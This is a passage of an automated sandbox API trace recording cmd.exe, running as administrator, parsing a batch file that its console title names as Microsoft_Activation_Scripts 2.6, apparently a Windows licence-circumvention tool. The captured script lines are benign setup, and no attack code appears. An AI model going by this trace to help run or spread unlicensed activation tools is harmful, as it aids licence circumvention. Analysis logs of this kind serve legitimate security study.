Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0177.376] GetProcessHeap () returned 0x19a8f1e0000 [0177.376] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8d00) returned 1 [0177.376] GetProcessHeap () returned 0x19a8f1e0000 [0177.376] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0177.376] GetProcessHeap () returned 0x19a8f1e0000 [0177.376] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0177.376] GetProcessHeap () returned 0x19a8f1e0000 [0177.377] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee610) returned 1 [0177.377] GetProcessHeap () returned 0x19a8f1e0000 [0177.377] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0177.377] GetProcessHeap () returned 0x19a8f1e0000 [0177.377] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0df0) returned 1 [0177.377] GetProcessHeap () returned 0x19a8f1e0000 [0177.377] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7d0) returned 1 [0177.377] GetProcessHeap () returned 0x19a8f1e0000 [0177.378] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0177.378] GetProcessHeap () returned 0x19a8f1e0000 [0177.378] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0177.378] GetProcessHeap () returned 0x19a8f1e0000 [0177.378] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.378] GetProcessHeap () returned 0x19a8f1e0000 [0177.378] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0177.378] GetProcessHeap () returned 0x19a8f1e0000 [0177.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0177.379] GetProcessHeap () returned 0x19a8f1e0000 [0177.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0177.379] GetProcessHeap () returned 0x19a8f1e0000 [0177.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0177.379] GetProcessHeap () returned 0x19a8f1e0000 [0177.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0177.379] GetProcessHeap () returned 0x19a8f1e0000 [0177.380] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0177.380] GetProcessHeap () returned 0x19a8f1e0000 [0177.380] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09b0) returned 1 [0177.380] GetProcessHeap () returned 0x19a8f1e0000 [0177.380] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0177.380] GetProcessHeap () returned 0x19a8f1e0000 [0177.381] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0177.381] GetProcessHeap () returned 0x19a8f1e0000 [0177.381] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0177.381] GetProcessHeap () returned 0x19a8f1e0000 [0177.381] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec860) returned 1 [0177.381] GetProcessHeap () returned 0x19a8f1e0000 [0177.381] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0177.381] GetProcessHeap () returned 0x19a8f1e0000 [0177.381] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0177.381] GetProcessHeap () returned 0x19a8f1e0000 [0177.382] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0177.382] GetProcessHeap () returned 0x19a8f1e0000 [0177.382] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec840) returned 1 [0177.382] GetProcessHeap () returned 0x19a8f1e0000 [0177.382] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0177.382] GetProcessHeap () returned 0x19a8f1e0000 [0177.382] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0177.382] GetProcessHeap () returned 0x19a8f1e0000 [0177.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0177.383] GetProcessHeap () returned 0x19a8f1e0000 [0177.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0e30) returned 1 [0177.383] GetProcessHeap () returned 0x19a8f1e0000 [0177.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eccc0) returned 1 [0177.383] GetProcessHeap () returned 0x19a8f1e0000 [0177.384] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0177.384] GetProcessHeap () returned 0x19a8f1e0000 [0177.384] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0177.384] GetProcessHeap () returned 0x19a8f1e0000 [0177.384] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ef0) returned 1 [0177.384] GetProcessHeap () returned 0x19a8f1e0000 [0177.384] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6e0) returned 1 [0177.384] GetProcessHeap () returned 0x19a8f1e0000 [0177.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8be0) returned 1 [0177.385] GetProcessHeap () returned 0x19a8f1e0000 [0177.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0177.385] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.385] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f4 [0177.385] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.385] SetFilePointer (in: hFile=0x84, lDistanceToMove=4342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f6 [0177.386] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\no MASend\r\n...\r\nd powershell.exe in the system.\r\n (\r\n1 and their Server equivalent.\r\n===================================================\r\n") returned 2 [0177.386] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.386] GetFileType (hFile=0x84) returned 0x1 [0177.386] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.386] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f6 [0177.386] GetProcessHeap () returned 0x19a8f1e0000 [0177.386] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.386] GetProcessHeap () returned 0x19a8f1e0000 [0177.386] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.386] _tell (_FileHandle=3) returned 4342 [0177.386] _close (_FileHandle=3) returned 0 [0177.387] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.387] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.387] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.387] SetFilePointer (in: hFile=0x84, lDistanceToMove=4342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f6 [0177.387] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.387] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f6 [0177.387] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.387] SetFilePointer (in: hFile=0x84, lDistanceToMove=4482, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1182 [0177.388] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0177.388] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.388] GetFileType (hFile=0x84) returned 0x1 [0177.388] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.388] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1182 [0177.388] GetProcessHeap () returned 0x19a8f1e0000 [0177.388] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.388] GetProcessHeap () returned 0x19a8f1e0000 [0177.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.388] _tell (_FileHandle=3) returned 4482 [0177.388] _close (_FileHandle=3) returned 0 [0177.389] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.389] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.389] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.389] SetFilePointer (in: hFile=0x84, lDistanceToMove=4482, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1182 [0177.389] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.389] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1182 [0177.389] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.389] SetFilePointer (in: hFile=0x84, lDistanceToMove=4484, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1184 [0177.389] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0177.389] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.390] GetFileType (hFile=0x84) returned 0x1 [0177.390] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.390] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1184 [0177.390] GetProcessHeap () returned 0x19a8f1e0000 [0177.390] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.390] GetProcessHeap () returned 0x19a8f1e0000 [0177.390] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.390] _tell (_FileHandle=3) returned 4484 [0177.390] _close (_FileHandle=3) returned 0 [0177.391] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.391] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.391] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.391] SetFilePointer (in: hFile=0x84, lDistanceToMove=4484, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1184 [0177.391] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.391] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1184 [0177.391] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.391] SetFilePointer (in: hFile=0x84, lDistanceToMove=4536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11b8 [0177.391] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Fix special characters limitation in path name\r\n", cbMultiByte=52, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Fix special characters limitation in path name\r\n======================================================================================\r\n") returned 52 [0177.391] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.391] GetFileType (hFile=0x84) returned 0x1 [0177.391] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.391] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11b8 [0177.392] GetProcessHeap () returned 0x19a8f1e0000 [0177.392] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.392] GetProcessHeap () returned 0x19a8f1e0000 [0177.392] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.392] _tell (_FileHandle=3) returned 4536 [0177.392] _close (_FileHandle=3) returned 0 [0177.392] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.393] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.393] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.393] SetFilePointer (in: hFile=0x84, lDistanceToMove=4536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11b8 [0177.393] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.393] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11b8 [0177.393] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.393] SetFilePointer (in: hFile=0x84, lDistanceToMove=4538, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11ba [0177.393] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Fix special characters limitation in path name\r\n======================================================================================\r\n") returned 2 [0177.393] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.393] GetFileType (hFile=0x84) returned 0x1 [0177.393] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.393] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11ba [0177.393] GetProcessHeap () returned 0x19a8f1e0000 [0177.393] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.393] GetProcessHeap () returned 0x19a8f1e0000 [0177.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.394] _tell (_FileHandle=3) returned 4538 [0177.394] _close (_FileHandle=3) returned 0 [0177.394] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.394] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.394] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.394] SetFilePointer (in: hFile=0x84, lDistanceToMove=4538, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11ba [0177.395] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.395] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11ba [0177.395] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.395] SetFilePointer (in: hFile=0x84, lDistanceToMove=4557, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11cd [0177.395] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_work=%~dp0\"\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_work=%~dp0\"\r\nracters limitation in path name\r\n======================================================================================\r\n") returned 19 [0177.395] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.395] GetFileType (hFile=0x84) returned 0x1 [0177.395] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.395] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11cd [0177.395] GetProcessHeap () returned 0x19a8f1e0000 [0177.395] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.396] GetProcessHeap () returned 0x19a8f1e0000 [0177.396] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8940 [0177.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x208, lpBuffer=0x43f9efe920, lpFilePart=0x43f9efe480 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x43f9efe480*="MAS_15344413.cmd") returned 0x20 [0177.396] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f8760 [0177.397] FindClose (in: hFindFile=0x19a8f1f8760 | out: hFindFile=0x19a8f1f8760) returned 1 [0177.397] memcpy (in: _Dst=0x43f9efe926, _Src=0x43f9efe1dc, _Size=0xe | out: _Dst=0x43f9efe926) returned 0x43f9efe926 [0177.397] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b59ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f3c25e5, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x19a8f1f8a60 [0177.397] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0177.397] memcpy (in: _Dst=0x43f9efe936, _Src=0x43f9efe1dc, _Size=0x8 | out: _Dst=0x43f9efe936) returned 0x43f9efe936 [0177.397] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3c25e5, ftCreationTime.dwHighDateTime=0x1da9886, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f4a7656, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x6d9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAS_15344413.cmd", cAlternateFileName="MAS_15~1.CMD")) returned 0x19a8f1f8ca0 [0177.397] FindClose (in: hFindFile=0x19a8f1f8ca0 | out: hFindFile=0x19a8f1f8ca0) returned 1 [0177.397] _wcsnicmp (_String1="MAS_15~1.CMD", _String2="MAS_15344413.cmd", _MaxCount=0x10) returned 75 [0177.397] memcpy (in: _Dst=0x43f9efe940, _Src=0x43f9efe1dc, _Size=0x20 | out: _Dst=0x43f9efe940) returned 0x43f9efe940 [0177.397] GetProcessHeap () returned 0x19a8f1e0000 [0177.398] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0e30 [0177.398] GetProcessHeap () returned 0x19a8f1e0000 [0177.398] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.398] _wcsicmp (_String1="set", _String2=")") returned 74 [0177.398] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0177.398] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0177.398] _wcsicmp (_String1="IF", _String2="set") returned -10 [0177.398] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0177.398] _wcsicmp (_String1="REM", _String2="set") returned -1 [0177.398] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0177.398] GetProcessHeap () returned 0x19a8f1e0000 [0177.398] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0177.398] GetProcessHeap () returned 0x19a8f1e0000 [0177.399] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb80 [0177.399] GetProcessHeap () returned 0x19a8f1e0000 [0177.399] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x44) returned 0x19a8f1f90e0 [0177.399] _tell (_FileHandle=3) returned 4557 [0177.399] _close (_FileHandle=3) returned 0 [0177.399] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.399] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.399] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.399] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.399] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.399] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.399] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.399] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.399] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.399] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.399] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.399] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.400] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.400] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.400] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.400] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.400] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.400] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.400] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.400] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.400] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.400] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.400] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.400] GetProcessHeap () returned 0x19a8f1e0000 [0177.400] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x78) returned 0x19a8f1eeca0 [0177.400] GetProcessHeap () returned 0x19a8f1e0000 [0177.400] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eeca0, Size=0x44) returned 0x19a8f1f8f00 [0177.400] GetProcessHeap () returned 0x19a8f1e0000 [0177.400] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f8f00) returned 0x44 [0177.401] wcsncmp (_String1="\"_wo", _String2="/", _MaxCount=0x4) returned -13 [0177.401] GetProcessHeap () returned 0x19a8f1e0000 [0177.401] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f89a0 [0177.401] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.401] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.401] SetEnvironmentVariableW (lpName="_work", lpValue="C:\\Windows\\Temp\\") returned 1 [0177.401] GetProcessHeap () returned 0x19a8f1e0000 [0177.401] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2029e0) returned 1 [0177.401] GetEnvironmentStringsW () returned 0x19a8f1ffdd0* [0177.401] GetProcessHeap () returned 0x19a8f1e0000 [0177.401] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xe5e) returned 0x19a8f204690 [0177.402] memcpy (in: _Dst=0x19a8f204690, _Src=0x19a8f1ffdd0, _Size=0xe5e | out: 